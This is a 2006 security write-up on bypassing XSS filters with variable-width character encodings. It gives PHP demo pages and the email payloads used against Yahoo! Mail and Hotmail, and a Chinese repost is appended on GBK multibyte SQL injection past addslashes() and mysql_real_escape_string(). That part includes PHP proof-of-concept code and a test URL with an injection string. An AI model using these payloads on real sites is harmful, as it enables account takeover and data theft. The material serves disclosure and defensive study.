Bypassing script filters with variable-width encodings

Author: Cheng Peng Su (applesoup_at_gmail.com)
Date: August 7, 2006

We've all known that the main problem of constructing XSS attacks is
how to obfuscate malicious code. In the following paragraphs I will

attempt to explain the concept of bypassing script filters with
variable-width encodings, and disclose the applications of this
concept to

Hotmail and Yahoo! Mail web-based mail services.

Variable-width encoding Introduction
====================================

A variable-width encoding(a.k.a variable-length encoding) is a type of
character encoding scheme in which codes of differing lengths are

used to encode a character set. Most common variable-width encodings
are multibyte encodings, which use varying numbers of bytes to encode

different characters. The first use of multibyte encodings was for the
encoding of Chinese, Japanese and Korean, which have large character

sets well in excess of 256 characters. The Unicode standard has two
variable-width encodings: UTF-8 and UTF-16. The most commonly-used

codes are two-byte codes. The EUC-CN form of GB2312, plus EUC-JP and
EUC-KR, are examples of such two-byte EUC codes. And there are also

some three-byte and four-byte codes.

Example and Discussion
======================

The following is a php file from which I will start to introduce my idea.

------------------------------example.php--------------------------------

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<?

for($i=0;$i<256;$i++){
echo "Char $i is <font face=\"xyz".chr($i)."\">not </font>"
."<font face=\" onmouseover=alert($i) notexist=".chr($i)."\"     >"
// NOTE: 5 space characters following the last \"
."available</font>\r\n\r\n<br>\r\n\r\n";
}

?>
</body>
</html>

-------------------------------------------------------------------------

For most values of $i, Internet Explorer 6.0(SP2) will display "Char
XXX is not available". When $i is between 192(0xC0) and 255(0xFF), you

can see "Char XXX is available". Let's take $i=0xC0 for example,
consider the following code:

Char 192 is <font face="xyz[0xC0]">not </font><font face="
onmouseover=alert(192) s=[0xC0]"     >available</font>

0xC0 is one of the 32 first bytes of 2-byte sequences (0xC0-0xDF) in
UTF-8. So when IE parses the above code, it will consider 0xC0 and the

following quote as a sequence, and therefore these two pairs of FONT
elements will become one with "xyz[0xC0]">not </font><font face=" as

the value of FACE parameter. The second 0xC0 will start another 2-byte
sequence as a value of NOTEXIST parameter which is not quoted. Due

to a space character following by the quote, 0xE0-0xEF which are first
bytes of 3-byte sequences, together with the following quote and one

space character will be considered as the value of NOTEXIST parameter.
And each of the first bytes of 4-byte sequences(0xF0-0xF7), 5-byte

sequences(0xF8-0xFB), 6-byte sequences(0xFC-0xFD), together with the
following quote and space characters will be considered as one

sequence.

Here are the results of the above code parsed by Internet Explorer
6.0(SP2), Firefox 1.5.0.6 and Opera 9.0.1 in different variable-width

encodings respectively. Note that the numbers in the table are the
ranges of "available" characters.

+-----------+-----------+-----------+-----------+
|           | IE        | FF        | OP        |
+-----------+-----------+-----------+-----------+
| UTF-8     | 0xC0-0xFF | none      | none      |
+-----------+-----------+-----------+-----------+
| GB2312    | 0x81-0xFE | none      | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| GB18030   | none      | none      | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| BIG5      | 0x81-0xFE | none      | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| EUC-KR    | 0x81-0xFE | none      | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| EUC-JP    | 0x81-0x8D | 0x8F      | 0x8E      |
|           | 0x8F-0x9F |           | 0x8F      |
|           | 0xA1-0xFE |           | 0xA1-0xFE |
+-----------+-----------+-----------+-----------+
| SHIFT_JIS | 0x81-0x9F | 0x81-0x9F | 0x81-0x9F |
|           | 0xE0-0xFC | 0xE0-0xFC | 0xE0-0xFC |
+-----------+-----------+-----------+-----------+

Application
===========

I don't think there is a typical exploitation of bypassing script
filters with variable-width encodings, because the exploitation is
very

flexible. But you just need to remember that if the webapp use
variable-width encodings, you can bury some characters following by
your

entry, and the buried characters might be very crucial.

The above code might be exploited in general webapps which allow you
to add formatting to your entry in the same way as HTML does. For

example, in some forums, [font=Courier New]message[/font] in your
message will be transformed into <font face="Courier
New">message</font>.

Supposing it use UTF-8, we can attack by sending

[font=xyz[0xC0]]buried[/font][font=abc onmouseover=alert()
s=[0xC0]]exploited[/font]

And it will be tranformed into

<font face="xyz[0xC0]">buried</font><font face="abc
onmouseover=alert() s=[0xC0]">exploited</font>

Again, the exploitation is very flexible, this FONT-FONT example is
just an enlightening one. The following exploitaion to Yahoo! Mail is

quite different from this one.

Disclosure
==========

Using this method, I have found two XSS vulnerabilities in Hotmail and
Yahoo! Mail web-based mail services. I informed Yahoo and Microsoft

on April 30 and May 12 respectively. And they have patched the vulnerabilities.

Yahoo! Mail XSS
---------------

Before I discovered this vulnerability, Yahoo! Mail filtering engine
could block "expression()" syntax in a CSS attribute using a comment

to break up expression( expr/* */ession() ). I used [0x81] with the
following asterisk to make a sequence, so that the second */ would

close the comment. But the filtering engine considered the first two
comment symbol as a pair.

--------------------------------------------------------------------
MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=GB2312
Subject: example

<span style='width:expr/*[0x81]*/*/ession(alert())'>exploited</span>
.
--------------------------------------------------------------------

Hotmail XSS
-----------

This exploitation is almost the same as the example.php.

--------------------------------------------------------------------
MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=SHIFT_JIS
Subject: example

<font face="[0x81]"></font><font face=" onmouseover=alert()
s=[0x81]">exploited</font>
.
--------------------------------------------------------------------

Reference
=========

Wikipedia:Variable-width
encoding(http://en.wikipedia.org/wiki/Variable-width_encoding)
RFC 3629, the UTF-8 standard(http://tools.ietf.org/html/rfc3629)
RSnake:XSS Cheat Sheet(http://ha.ckers.org/xss.html)

( Original text: http://applesoup.googlepages.com/bypass_filter.txt )

PHP字符编码绕过漏洞总结

其实这东西国内少数黑客早已知道,只不过没有共享公布而已。有些人是不愿共享,宁愿烂在地里,另外的一些则是用来牟利。
该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过 addslashes() 转换后变为0xbf5c27,前面的0xbf5c是个有效的GBK字符,所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理,结果漏洞 就触发了。

mysql_real_escape_string() 也存在相同的问题,只不过相比 addslashes() 它考虑到了用什么字符集来处理,因此可以用相应的字符集来处理字符。在MySQL 中有两种改变默认字符集的方法。

方法一:

改变mysql配置文件my.cnf
[client]
default-character-set=GBK
方法二:
在建立连接时使用
CODE:
SET CHARACTER SET 'GBK'
例:mysql_query("SET CHARACTER SET 'gbk'", $c);
问题是方法二在改变字符集时mysql_real_escape_string() 并不知道而使用默认字符集处理从而造成和 addslashes() 一样的漏洞
下面是来自http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html的测试代码
<?php

$c = mysql_connect("localhost", "user", "pass");
mysql_select_db("database", $c);

// change our character set
mysql_query("SET CHARACTER SET 'gbk'", $c);

// create demo table
mysql_query("CREATE TABLE users (
username VARCHAR(32) PRIMARY KEY,
password VARCHAR(32)
) CHARACTER SET 'GBK'", $c);
mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')", $c);

// now the exploit code
$_POST['username'] = chr(0xbf) . chr(0x27) . ' OR username = username /*';
$_POST['password'] = 'anything';

// Proper escaping, we should be safe, right?
$user = mysql_real_escape_string($_POST['username'], $c);
$passwd = mysql_real_escape_string($_POST['password'], $c);

$sql = "SELECT * FROM  users WHERE  username = '{$user}' AND password = '{$passwd}'";
$res = mysql_query($sql, $c);
echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records

?>
纵观以上两种触发漏洞的关键是addslashes() 在Mysql配置为GBK时就可以触发漏洞,而mysql_real_escape_string() 是在不知道字符集的情况下用默认字符集处理产生漏洞的。
下面再来分析下国内最近漏洞产生的原因。
问题出现在一些字符转换函数上,例如mb_convert_encoding()和iconv()等。
发布在80sec上的说明说0xc127等一些字符再被addslashes() 处理成0xc15c27后,又经过一些字符转换函数变为0×808027,而使得经过addslashes() 加上的"\"失效,这样单引号就又发挥作用了。这就造成了字符注入漏洞。
根据80sec的说明,iconv()没有该问题,但经我用0xbf27测试
$id1=mb_convert_encoding($_GET['id'], 'utf-8', 'gbk');
$id2=iconv('gbk//IGNORE', 'utf-8', $_GET['id']);
$id3=iconv('gbk', 'utf-8', $_GET['id']);
这些在GPC开启的情况下还是会产生字符注入漏洞,测试代码如下:
<?php

$c = mysql_connect("localhost", "user", "pass");
mysql_select_db("database", $c);

// change our character set
mysql_query("SET CHARACTER SET 'gbk'", $c);

// create demo table
mysql_query("CREATE TABLE users (
username VARCHAR(32) PRIMARY KEY,
password VARCHAR(32)
) CHARACTER SET 'GBK'", $c);
mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')", $c);

// now the exploit code
//$id1=mb_convert_encoding($_GET['id'], 'utf-8', 'gbk');
$id2=iconv('gbk//IGNORE', 'utf-8', $_GET['id']);
//$id3=iconv('gbk', 'utf-8', $_GET['id']);

$sql = "SELECT * FROM  users WHERE  username = '{$id2}' AND password = 'password'";
$res = mysql_query($sql, $c);
echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records

?>
测试情况 http://www.safe3.cn/test.php?id=%bf%27 OR username = username /*

后记,这里不光是%bf,其它许多字符也可以造成同样漏洞,大家可以自己做个测试的查下,这里有zwell文章提到的一个分析http://hackme.ntobjectives.com/sql_inject/login_addslashes.php 。编码的问题在xss中也有利用价值,详情请看我早期转载的一篇文章Bypassing script filters with variable-width encodings [注,已被转到本站]

from http://huaidan.org/archives/2268.html